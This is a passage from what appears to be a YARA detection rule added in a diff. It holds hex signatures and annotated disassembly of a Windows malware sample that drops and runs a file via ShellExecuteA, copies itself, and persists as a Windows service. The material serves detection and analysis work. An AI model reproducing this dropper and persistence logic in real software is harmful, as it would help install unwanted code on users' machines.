;kernel32.Sleep(0) + .text:0x0040739d 53 push ebx + .text:0x0040739e ffd6 call esi ;kernel32.Sleep(0) + .text:0x004073a0 8d95acf8ffff lea edx,dword [ebp - 1876] + .text:0x004073a6 52 push edx + .text:0x004073a7 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(local1880) + .text:0x004073ad 85c0 test eax,eax + .text:0x004073af 751f jnz 0x004073d0 + .text:0x004073b1 53 push ebx + .text:0x004073b2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004073b4 6892a44000 push 0x0040a492 + .text:0x004073b9 6818a24000 push 0x0040a218 + .text:0x004073be e85dc1ffff call 0x00403520 ;sub_00403520(kernel32.Sleep(0),local1880,local32,0x0040a218,0x0040a492) + .text:0x004073c3 6818a24000 push 0x0040a218 + .text:0x004073c8 e883f2ffff call 0x00406650 ;sub_00406650(0x0040a218) + .text:0x004073cd 83c40c add esp,12 + .text:0x004073d0 loc_004073d0: [1 XREFS] + .text:0x004073d0 53 push ebx + .text:0x004073d1 66891d10ac4000 mov word [0x0040ac10],bx + .text:0x004073d8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004073da e841f5ffff call 0x00406920 ;sub_00406920() + .text:0x004073df 5f pop edi + .text:0x004073e0 5e pop esi + .text:0x004073e1 33c0 xor eax,eax + .text:0x004073e3 5b pop ebx + .text:0x004073e4 8be5 mov esp,ebp + .text:0x004073e6 5d pop ebp + .text:0x004073e7 c21000 ret 16 + */ + $c30 = { 55 8B EC 81 EC 54 07 00 00 53 56 8B 35 ?? ?? ?? ?? 33 DB 57 53 FF D6 53 FF D6 90 90 90 90 90 90 90 90 90 53 FF D6 90 53 53 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 FF D6 90 FF 15 ?? ?? ?? ?? 53 FF D6 90 53 53 8D 45 ?? 53 50 FF 15 ?? ?? ?? ?? 53 FF D6 90 B9 FF 00 00 00 33 C0 8D BD ?? ?? ?? ?? 88 9D ?? ?? ?? ?? F3 AB 66 AB 68 54 03 00 00 68 18 A2 40 00 AA E8 ?? ?? ?? ?? 68 9A 01 00 00 68 78 A0 40 00 E8 ?? ?? ?? ?? 6A 01 E8 ?? ?? ?? ?? 83 C4 14 85 C0 74 ?? 53 FF D6 90 39 1D ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 53 FF D6 90 5F 5E 33 C0 5B 8B E5 5D C2 10 00 B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 F3 AB 66 AB 53 AA FF D6 8D 8D ?? ?? ?? ?? 68 04 01 00 00 51 68 FC A3 40 00 FF 15 ?? ?? ?? ?? 53 FF D6 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 FC A3 40 00 E8 ?? ?? ?? ?? 53 FF D6 8B 0D ?? ?? ?? ?? 68 FC A3 40 00 E8 ?? ?? ?? ?? 80 B8 ?? ?? ?? ?? 5C 75 ?? 8B 0D ?? ?? ?? ?? 68 FC A3 40 00 E8 ?? ?? ?? ?? C6 80 ?? ?? ?? ?? 00 53 C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 5C C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 00 FF D6 68 60 A4 40 00 8D 45 ?? 68 FC A3 40 00 50 68 D8 AA 40 00 E8 ?? ?? ?? ?? 83 C4 10 53 FF D6 8B 0D ?? ?? ?? ?? 68 E0 A0 40 00 68 34 AC 40 00 E8 ?? ?? ?? ?? 53 FF D6 39 1D ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? A0 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 F3 AB 66 AB 53 AA FF D6 8D 8D ?? ?? ?? ?? 68 04 01 00 00 51 53 FF 15 ?? ?? ?? ?? 53 FF D6 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 D8 AA 40 00 52 E8 ?? ?? ?? ?? 85 C0 75 ?? A0 ?? ?? ?? ?? 66 C7 05 ?? ?? ?? ?? 03 00 3C 02 75 ?? 53 FF D6 53 C7 45 ?? 18 A2 40 00 C7 45 ?? A0 6D 40 00 89 5D ?? 89 5D ?? FF D6 53 66 C7 05 ?? ?? ?? ?? 01 00 FF D6 90 68 F4 01 00 00 FF D6 53 FF D6 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 FF D7 53 FF D6 68 E8 03 00 00 FF D6 53 FF D6 8D 4D ?? 51 FF D7 53 FF D6 66 C7 05 ?? ?? ?? ?? 02 00 E8 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2 10 00 6A 00 89 5D ?? FF D6 B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 F3 AB 66 AB 6A 00 C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 5C C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 00 AA FF D6 68 60 A4 40 00 8D 55 ?? 68 FC A3 40 00 8D 85 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 68 92 A4 40 00 68 18 A2 40 00 E8 ?? ?? ?? ?? 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 1C 6A 00 FF D6 68 FC A2 40 00 68 7C A2 40 00 8D 8D ?? ?? ?? ?? 68 18 A2 40 00 51 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 10 6A 00 FF D6 68 60 A4 40 00 E8 ?? ?? ?? ?? 83 C4 04 85 C0 75 ?? 8B 45 ?? 40 3D B8 0B 00 00 89 45 ?? 72 ?? 6A 00 C7 45 ?? 00 00 00 00 C6 45 ?? 6F C6 45 ?? 70 C6 45 ?? 65 C6 45 ?? 6E C6 45 ?? 00 FF D6 6A 05 6A 00 8D 95 ?? ?? ?? ?? 6A 00 8D 45 ?? 52 50 6A 00 FF D7 6A 00 FF D6 43 83 FB 03 73 ?? EB ?? 6A 00 FF D6 80 3D ?? ?? ?? ?? 01 75 ?? 8D 8D ?? ?? ?? ?? 51 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 08 6A 00 FF D6 A1 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 6A 00 FF D6 5F 5E 33 C0 5B 8B E5 5D C2 10 00 53 C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 00 FF D6 8D 55 ?? 68 18 A2 40 00 52 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 0C 53 FF D6 53 FF D6 53 C6 45 ?? 43 C6 45 ?? 6F C6 45 ?? 6E C6 45 ?? 6E C6 45 ?? 65 C6 45 ?? 63 C6 45 ?? 74 C6 45 ?? 47 C6 45 ?? 72 C6 45 ?? 6F C6 45 ?? 75 C6 45 ?? 70 C6 45 ?? 00 FF D6 53 FF D6 53 FF D6 53 FF D6 8D 85 ?? ?? ?? ?? 68 00 04 00 00 8D 4D ?? 50 51 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 10 53 FF D6 53 FF D6 53 FF D6 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF D6 68 92 A4 40 00 68 18 A2 40 00 E8 ?? ?? ?? ?? 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 0C 53 66 89 1D ?? ?? ?? ?? FF D6 E8 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2 10 00 } + /* +function at 0x00402950@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - get common file path + .text:0x00402950 + .text:0x00402950 FUNC: int bfastcall_caller sub_00402950( int eax, int edx, int ecx, int arg3, ) [2 XREFS] + .text:0x00402950 + .text:0x00402950 Stack Variables: (offset from initial top of stack) + .text:0x00402950 4: int arg3 + .text:0x00402950 -4: int local4 + .text:0x00402950 -5: int local5 + .text:0x00402950 -6: int local6 + .text:0x00402950 -7: int local7 + .text:0x00402950 -8: int local8 + .text:0x00402950 -9: int local9 + .text:0x00402950 -10: int local10 + .text:0x00402950 -11: int local11 + .text:0x00402950 -12: int local12 + .text:0x00402950 + .text:0x00402950 83ec0c sub esp,12 + .text:0x00402953 56 push esi + .text:0x00402954 8b3578904000 mov esi,dword [0x00409078] + .text:0x0040295a 57 push edi + .text:0x0040295b b15c mov cl,92 + .text:0x0040295d b073 mov al,115 + .text:0x0040295f 6a00 push 0 + .text:0x00402961 884c240c mov byte [esp + 12],cl + .text:0x00402965 8844240d mov byte [esp + 13],al + .text:0x00402969 c644240e79 mov byte [esp + 14],121 + .text:0x0040296e 8844240f mov byte [esp + 15],al + .text:0x00402972 c644241074 mov byte [esp + 16],116 + .text:0x00402977 c644241165 mov byte [esp + 17],101 + .text:0x0040297c c64424126d mov byte [esp + 18],109 + .text:0x00402981 884c2413 mov byte [esp + 19],cl + .text:0x00402985 c644241400 mov byte [esp + 20],0 + .text:0x0040298a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040298c b941000000 mov ecx,65 + .text:0x00402991 33c0 xor eax,eax + .text:0x00402993 bfb8a84000 mov edi,0x0040a8b8 + .text:0x00402998 50 push eax + .text:0x00402999 f3ab rep: stosd + .text:0x0040299b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040299d 6804010000 push 260 + .text:0x004029a2 68b8a84000 push 0x0040a8b8 + .text:0x004029a7 ff15b8904000 call dword [0x004090b8] ;kernel32.GetWindowsDirectoryA(0x0040a8b8,260) + .text:0x004029ad 6a00 push 0 + .text:0x004029af ffd6 call esi ;kernel32.Sleep(0) + .text:0x004029b1 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004029b7 8d442408 lea eax,dword [esp + 8] + .text:0x004029bb 50 push eax + .text:0x004029bc 68b8a84000 push 0x0040a8b8 + .text:0x004029c1 e8ea1c0000 call 0x004046b0 ;sub_004046b0(0x0040a8b8,local12) + .text:0x004029c6 8b4c2418 mov ecx,dword [esp + 24] + .text:0x004029ca 51 push ecx + .text:0x004029cb 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004029d1 68b8a84000 push 0x0040a8b8 + .text:0x004029d6 e8d51c0000 call 0x004046b0 ;sub_004046b0(0x0040a8b8,arg3) + .text:0x004029db 5f pop edi + .text:0x004029dc 5e pop esi + .text:0x004029dd 83c40c add esp,12 + .text:0x004029e0 c3 ret + */ + $c31 = { 83 EC 0C 56 8B 35 ?? ?? ?? ?? 57 B1 5C B0 73 6A 00 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 79 88 44 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 65 C6 44 24 ?? 6D 88 4C 24 ?? C6 44 24 ?? 00 FF D6 B9 41 00 00 00 33 C0 BF B8 A8 40 00 50 F3 AB FF D6 68 04 01 00 00 68 B8 A8 40 00 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 0D ?? ?? ?? ?? 8D 44 24 ?? 50 68 B8 A8 40 00 E8 ?? ?? ?? ?? 8B 4C 24 ?? 51 8B 0D ?? ?? ?? ?? 68 B8 A8 40 00 E8 ?? ?? ?? ?? 5F 5E 83 C4 0C C3 } + /* +function at 0x00403a40@9324d1a8ae37a36ae560c37448c9705a with 3 features: + - check if file exists + - get common file path + - write file on Windows + .text:0x00403a40 + .text:0x00403a40 FUNC: int stdcall sub_00403a40( int arg0, int arg1, int arg2, ) [4 XREFS] + .text:0x00403a40 + .text:0x00403a40 Stack Variables: (offset from initial top of stack) + .text:0x00403a40 12: int arg2 + .text:0x00403a40 8: int arg1 + .text:0x00403a40 4: int arg0 + .text:0x00403a40 -260: int local260 + .text:0x00403a40 -312: int local312 + .text:0x00403a40 -316: int local316 + .text:0x00403a40 -319: int local319 + .text:0x00403a40 -320: int local320 + .text:0x00403a40 -321: int local321 + .text:0x00403a40 -322: int local322 + .text:0x00403a40 -323: int local323 + .text:0x00403a40 -324: int local324 + .text:0x00403a40 -325: int local325 + .text:0x00403a40 -326: int local326 + .text:0x00403a40 -327: int local327 + .text:0x00403a40 -328: int local328 + .text:0x00403a40 -332: int local332 + .text:0x00403a40 -333: int local333 + .text:0x00403a40 -334: int local334 + .text:0x00403a40 -335: int local335 + .text:0x00403a40 -336: int local336 + .text:0x00403a40 + .text:0x00403a40 81ec50010000 sub esp,336 + .text:0x00403a46 56 push esi + .text:0x00403a47 8b3578904000 mov esi,dword [0x00409078] + .text:0x00403a4d 57 push edi + .text:0x00403a4e 6a00 push 0 + .text:0x00403a50 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403a52 8d442454 lea eax,dword [esp + 84] + .text:0x00403a56 6804010000 push 260 + .text:0x00403a5b 50 push eax + .text:0x00403a5c ff15b8904000 call dword [0x004090b8] ;kernel32.GetWindowsDirectoryA(local260,260) + .text:0x00403a62 b045 mov al,69 + .text:0x00403a64 6a00 push 0 + .text:0x00403a66 c64424145c mov byte [esp + 20],92 + .text:0x00403a6b c644241552 mov byte [esp + 21],82 + .text:0x00403a70 c644241675 mov byte [esp + 22],117 + .text:0x00403a75 c644241725 mov byte [esp + 23],37 + .text:0x00403a7a c644241864 mov byte [esp + 24],100 + .text:0x00403a7f c64424192e mov byte [esp + 25],46 + .text:0x00403a84 8844241a mov byte [esp + 26],al + .text:0x00403a88 c644241b58 mov byte [esp + 27],88 + .text:0x00403a8d 8844241c mov byte [esp + 28],al + .text:0x00403a91 c644241d00 mov byte [esp + 29],0 + .text:0x00403a96 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403a98 ff15d0904000 call dword [0x004090d0] ;kernel32.GetTickCount() + .text:0x00403a9e 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00403aa2 50 push eax + .text:0x00403aa3 8d542424 lea edx,dword [esp + 36] + .text:0x00403aa7 51 push ecx + .text:0x00403aa8 52 push edx + .text:0x00403aa9 ff15d8914000 call dword [0x004091d8] ;user32.wsprintfA(local312,local328) + .text:0x00403aaf 83c40c add esp,12 + .text:0x00403ab2 6a00 push 0 + .text:0x00403ab4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403ab6 8d442420 lea eax,dword [esp + 32] + .text:0x00403aba 8d4c2454 lea ecx,dword [esp + 84] + .text:0x00403abe 50 push eax + .text:0x00403abf 51 push ecx + .text:0x00403ac0 ff15cc904000 call dword [0x004090cc] ;kernel32.lstrcatA(local260,local312) + .text:0x00403ac6 6a00 push 0 + .text:0x00403ac8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403aca 6a00 push 0 + .text:0x00403acc 6880000000 push 128 + .text:0x00403ad1 6a02 push 2 + .text:0x00403ad3 6a00 push 0 + .text:0x00403ad5 6a02 push 2 + .text:0x00403ad7 8d542468 lea edx,dword [esp + 104] + .text:0x00403adb 6800000040 push 0x40000000 + .text:0x00403ae0 52 push edx + .text:0x00403ae1 ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(local260,0x40000000,2,0,2,128,0) + .text:0x00403ae7 6a00 push 0 + .text:0x00403ae9 8bf8 mov edi,eax + .text:0x00403aeb ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403aed 83ffff cmp edi,0xffffffff + .text:0x00403af0 0f849a000000 jz 0x00403b90 + .text:0x00403af6 6a00 push 0 + .text:0x00403af8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403afa 8b8c2460010000 mov ecx,dword [esp + 352] + .text:0x00403b01 8b94245c010000 mov edx,dword [esp + 348] + .text:0x00403b08 8d44241c lea eax,dword [esp + 28] + .text:0x00403b0c 6a00 push 0 + .text:0x00403b0e 50 push eax + .text:0x00403b0f 51 push ecx + .text:0x00403b10 52 push edx + .text:0x00403b11 57 push edi + .text:0x00403b12 ff15a4904000 call dword [0x004090a4] ;kernel32.WriteFile(kernel32.CreateFileA(local260,0x40000000,2,0,2,128,0),arg0,arg1,local316,0) + .text:0x00403b18 6a00 push 0 + .text:0x00403b1a ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b1c 57 push edi + .text:0x00403b1d ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x00403ae1>) + .text:0x00403b23 83bc246401000002 cmp dword [esp + 356],2 + .text:0x00403b2b 7463 jz 0x00403b90 + .text:0x00403b2d 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00403b33 8d442454 lea eax,dword [esp + 84] + .text:0x00403b37 6a2e push 46 + .text:0x00403b39 50 push eax + .text:0x00403b3a e8d10d0000 call 0x00404910 ;sub_00404910(local260,46) + .text:0x00403b3f 85c0 test eax,eax + .text:0x00403b41 744d jz 0x00403b90 + .text:0x00403b43 6a00 push 0 + .text:0x00403b45 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b47 8d4c2454 lea ecx,dword [esp + 84] + .text:0x00403b4b c64424086f mov byte [esp + 8],111 + .text:0x00403b50 51 push ecx + .text:0x00403b51 c644240d70 mov byte [esp + 13],112 + .text:0x00403b56 c644240e65 mov byte [esp + 14],101 + .text:0x00403b5b c644240f6e mov byte [esp + 15],110 + .text:0x00403b60 c644241000 mov byte [esp + 16],0 + .text:0x00403b65 ff15bc904000 call dword [0x004090bc] ;kernel32.GetFileAttributesA(local260) + .text:0x00403b6b 83f8ff cmp eax,0xffffffff + .text:0x00403b6e 7420 jz 0x00403b90 + .text:0x00403b70 6a00 push 0 + .text:0x00403b72 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b74 6a05 push 5 + .text:0x00403b76 6a00 push 0 + .text:0x00403b78 8d54245c lea edx,dword [esp + 92] + .text:0x00403b7c 6a00 push 0 + .text:0x00403b7e 8d442414 lea eax,dword [esp + 20] + .text:0x00403b82 52 push edx + .text:0x00403b83 50 push eax + .text:0x00403b84 6a00 push 0 + .text:0x00403b86 ff15ac914000 call dword [0x004091ac] ;shell32.ShellExecuteA(0,local336,local260,0,0,5) + .text:0x00403b8c 6a00 push 0 + .text:0x00403b8e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b90 loc_00403b90: [4 XREFS] + .text:0x00403b90 5f pop edi + .text:0x00403b91 33c0 xor eax,eax + .text:0x00403b93 5e pop esi + .text:0x00403b94 81c450010000 add esp,336 + .text:0x00403b9a c20c00 ret 12 + */ + $c32 = { 81 EC 50 01 00 00 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 8D 44 24 ?? 68 04 01 00 00 50 FF 15 ?? ?? ?? ?? B0 45 6A 00 C6 44 24 ?? 5C C6 44 24 ?? 52 C6 44 24 ?? 75 C6 44 24 ?? 25 C6 44 24 ?? 64 C6 44 24 ?? 2E 88 44 24 ?? C6 44 24 ?? 58 88 44 24 ?? C6 44 24 ?? 00 FF D6 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 54 24 ?? 51 52 FF 15 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 68 80 00 00 00 6A 02 6A 00 6A 02 8D 54 24 ?? 68 00 00 00 40 52 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 83 FF FF 0F 84 ?? ?? ?? ?? 6A 00 FF D6 8B 8C 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 6A 00 50 51 52 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 57 FF 15 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? 02 74 ?? 8B 0D ?? ?? ?? ?? 8D 44 24 ?? 6A 2E 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 8D 4C 24 ?? C6 44 24 ?? 6F 51 C6 44 24 ?? 70 C6 44 24 ?? 65 C6 44 24 ?? 6E C6 44 24 ?? 00 FF 15 ?? ?? ?? ?? 83 F8 FF 74 ?? 6A 00 FF D6 6A 05 6A 00 8D 54 24 ?? 6A 00 8D 44 24 ?? 52 50 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D6 5F 33 C0 5E 81 C4 50 01 00 00 C2 0C 00 } + /* +function at 0x004073f0@9324d1a8ae37a36ae560c37448c9705a with 6 features: + - copy file + - create service + - modify service + - persist via Windows service + - set registry value + - start service + .text:0x004073f0 + .text:0x004073f0 FUNC: int cdecl sub_004073f0( int arg0, int arg1, int arg2, int arg3, ) [2 XREFS] + .text:0x004073f0 + .text:0x004073f0 Stack Variables: (offset from initial top of stack) + .text:0x004073f0 16: int arg3 + .text:0x004073f0 12: int arg2 + .text:0x004073f0 8: int arg1 + .text:0x004073f0 4: int arg0 + .text:0x004073f0 -8: int local8 + .text:0x004073f0 -20: int local20 + .text:0x004073f0 -288: int local288 + .text:0x004073f0 -548: int local548 + .text:0x004073f0 -552: int local552 + .text:0x004073f0 -811: int local811 + .text:0x004073f0 -812: int local812 + .text:0x004073f0 -816: int local816 + .text:0x004073f0 -820: int local820 + .text:0x004073f0 -822: int local822 + .text:0x004073f0 -823: int local823 + .text:0x004073f0 -824: int local824 + .text:0x004073f0 -828: int local828 + .text:0x004073f0 -830: int local830 + .text:0x004073f0 -831: int local831 + .text:0x004073f0 -832: int local832 + .text:0x004073f0 -833: int local833 + .text:0x004073f0 -834: int local834 + .text:0x004073f0 -835: int local835 + .text:0x004073f0 -836: int local836 + .text:0x004073f0 -837: int local837 + .text:0x004073f0 -838: int local838 + .text:0x004073f0 -839: int local839 + .text:0x004073f0 -840: int local840 + .text:0x004073f0 -841: int local841 + .text:0x004073f0 -842: int local842 + .text:0x004073f0 -843: int local843 + .text:0x004073f0 -844: int local844 + .text:0x004073f0 -845: int local845 + .text:0x004073f0 -846: int local846 + .text:0x004073f0 -847: int local847 + .text:0x004073f0 -848: int local848 + .text:0x004073f0 -849: int local849 + .text:0x004073f0 -850: int local850 + .text:0x004073f0 -851: int local851 + .text:0x004073f0 -852: int local852 + .text:0x004073f0 -853: int local853 + .text:0x004073f0 -854: int local854 + .text:0x004073f0 -855: int local855 + .text:0x004073f0 -856: int local856 + .text:0x004073f0 -857: int local857 + .text:0x004073f0 -858: int local858 + .text:0x004073f0 -859: int local859 + .text:0x004073f0 -860: int local860 + .text:0x004073f0 -861: int local861 + .text:0x004073f0 -862: int local862 + .text:0x004073f0 -863: int local863 + .text:0x004073f0 -864: int local864 + .text:0x004073f0 -868: int local868 + .text:0x004073f0 -869: int local869 + .text:0x004073f0 -870: int local870 + .text:0x004073f0 -871: int local871 + .text:0x004073f0 -872: int local872 + .text:0x004073f0 -873: int local873 + .text:0x004073f0 -874: int local874 + .text:0x004073f0 -875: int local875 + .text:0x004073f0 -876: int local876 + .text:0x004073f0 -877: int local877 + .text:0x004073f0 -878: int local878 + .text:0x004073f0 -879: int local879 + .text:0x004073f0 -880: int local880 + .text:0x004073f0 + .text:0x004073f0 55 push ebp + .text:0x004073f1 8bec mov ebp,esp + .text:0x004073f3 6aff push 0xffffffff + .text:0x004073f5 68b8924000 push 0x004092b8 + .text:0x004073fa 68907e4000 push 0x00407e90 + .text:0x004073ff 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x00407405 50 push eax + .text:0x00407406 64892500000000 fs: mov dword [0x00000000],esp + .text:0x0040740d 81ec5c030000 sub esp,860 + .text:0x00407413 53 push ebx + .text:0x00407414 56 push esi + .text:0x00407415 57 push edi + .text:0x00407416 c685d8fcffff00 mov byte [ebp - 808],0 + .text:0x0040741d b940000000 mov ecx,64 + .text:0x00407422 33c0 xor eax,eax + .text:0x00407424 8dbdd9fcffff lea edi,dword [ebp - 807] + .text:0x0040742a f3ab rep: stosd + .text:0x0040742c 66ab stosd + .text:0x0040742e aa stosb + .text:0x0040742f 33db xor ebx,ebx + .text:0x00407431 53 push ebx + .text:0x00407432 8b3578904000 mov esi,dword [0x00409078] + .text:0x00407438 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040743a 6804010000 push 260 + .text:0x0040743f 8d85d8fcffff lea eax,dword [ebp - 808] + .text:0x00407445 50 push eax + .text:0x00407446 53 push ebx + .text:0x00407447 ff1538914000 call dword [0x00409138] ;kernel32.GetModuleFileNameA(0,local812,260) + .text:0x0040744d 53 push ebx + .text:0x0040744e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407450 c685ccfcffff25 mov byte [ebp - 820],37 + .text:0x00407457 c685cdfcffff73 mov byte [ebp - 819],115 + .text:0x0040745e 889dcefcffff mov byte [ebp - 818],bl + .text:0x00407464 53 push ebx + .text:0x00407465 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407467 8b4d08 mov ecx,dword [ebp + 8] + .text:0x0040746a 51 push ecx + .text:0x0040746b 8d95ccfcffff lea edx,dword [ebp - 820] + .text:0x00407471 52 push edx + .text:0x00407472 8d85e0fdffff lea eax,dword [ebp - 544] + .text:0x00407478 50 push eax + .text:0x00407479 e8420a0000 call 0x00407ec0 ;msvcrt.sprintf(local548,local824) + .text:0x0040747e 83c40c add esp,12 + .text:0x00407481 53 push ebx + .text:0x00407482 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407484 8d8de0fdffff lea ecx,dword [ebp - 544] + .text:0x0040748a 51 push ecx + .text:0x0040748b 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407491 e85ad2ffff call 0x004046f0 ;sub_004046f0(local548) + .text:0x00407496 50 push eax + .text:0x00407497 8d95d8fcffff lea edx,dword [ebp - 808] + .text:0x0040749d 52 push edx + .text:0x0040749e 8d85e0fdffff lea eax,dword [ebp - 544] + .text:0x004074a4 50 push eax + .text:0x004074a5 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004074ab e8e0d0ffff call 0x00404590 ;sub_00404590(local548,local812,0,local548) + .text:0x004074b0 85c0 test eax,eax + .text:0x004074b2 746d jz 0x00407521 + .text:0x004074b4 53 push ebx + .text:0x004074b5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004074b7 8d8de0fdffff lea ecx,dword [ebp - 544] + .text:0x004074bd 51 push ecx + .text:0x004074be e8ddf0ffff call 0x004065a0 ;sub_004065a0(local548) + .text:0x004074c3 83c404 add esp,4 + .text:0x004074c6 53 push ebx + .text:0x004074c7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004074c9 53 push ebx + .text:0x004074ca 8d95e0fdffff lea edx,dword [ebp - 544] + .text:0x004074d0 52 push edx + .text:0x004074d1 8d85d8fcffff lea eax,dword [ebp - 808] + .text:0x004074d7 50 push eax + .text:0x004074d8 ff1564904000 call dword [0x00409064] ;kernel32.CopyFileA(local812,local548,0) + .text:0x004074de 53 push ebx + .text:0x004074df ffd6 call esi ;kernel32.Sleep(0) + .text:0x004074e1 8d8de0fdffff lea ecx,dword [ebp - 544] + .text:0x004074e7 51 push ecx + .text:0x004074e8 e813e3ffff call 0x00405800 ;sub_00405800(local548) + .text:0x004074ed 83c404 add esp,4 + .text:0x004074f0 53 push ebx + .text:0x004074f1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004074f3 b941000000 mov ecx,65 + .text:0x004074f8 33c0 xor eax,eax + .text:0x004074fa 8dbdd8fcffff lea edi,dword [ebp - 808] + .text:0x00407500 f3ab rep: stosd + .text:0x00407502 53 push ebx + .text:0x00407503 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407505 8d95e0fdffff lea edx,dword [ebp - 544] + .text:0x0040750b 52 push edx + .text:0x0040750c 8d85d8fcffff lea eax,dword [ebp - 808] + .text:0x00407512 50 push eax + .text:0x00407513 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407519 e852d2ffff call 0x00404770 ;sub_00404770(local812,local548) + .text:0x0040751e 53 push ebx + .text:0x0040751f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407521 loc_00407521: [1 XREFS] + .text:0x00407521 803d60a5400001 cmp byte [0x0040a560],1 + .text:0x00407528 0f84f5020000 jz 0x00407823 + .text:0x0040752e 53 push ebx + .text:0x0040752f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407531 6888130000 push 0x00001388 + .text:0x00407536 ffd6 call esi ;kernel32.Sleep(0x00001388) + .text:0x00407538 899ddcfdffff mov dword [ebp - 548],ebx + .text:0x0040753e 33ff xor edi,edi + .text:0x00407540 89bdd0fcffff mov dword [ebp - 816],edi + .text:0x00407546 899dd4fcffff mov dword [ebp - 812],ebx + .text:0x0040754c 895dfc mov dword [ebp - 4],ebx + .text:0x0040754f 53 push ebx + .text:0x00407550 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407552 683f000f00 push 0x000f003f + .text:0x00407557 53 push ebx + .text:0x00407558 53 push ebx + .text:0x00407559 ff1544904000 call dword [0x00409044] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x0040755f 8bd8 mov ebx,eax + .text:0x00407561 899dd4fcffff mov dword [ebp - 812],ebx + .text:0x00407567 57 push edi + .text:0x00407568 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040756a 85db test ebx,ebx + .text:0x0040756c 0f84a5020000 jz 0x00407817 + .text:0x00407572 57 push edi + .text:0x00407573 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407575 57 push edi + .text:0x00407576 57 push edi + .text:0x00407577 57 push edi + .text:0x00407578 57 push edi + .text:0x00407579 57 push edi + .text:0x0040757a 8d8dd8fcffff lea ecx,dword [ebp - 808] + .text:0x00407580 51 push ecx + .text:0x00407581 57 push edi + .text:0x00407582 6a02 push 2 + .text:0x00407584 6810010000 push 272 + .text:0x00407589 68ff010f00 push 0x000f01ff + .text:0x0040758e 8b5510 mov edx,dword [ebp + 16] + .text:0x00407591 52 push edx + .text:0x00407592 8b450c mov eax,dword [ebp + 12] + .text:0x00407595 50 push eax + .text:0x00407596 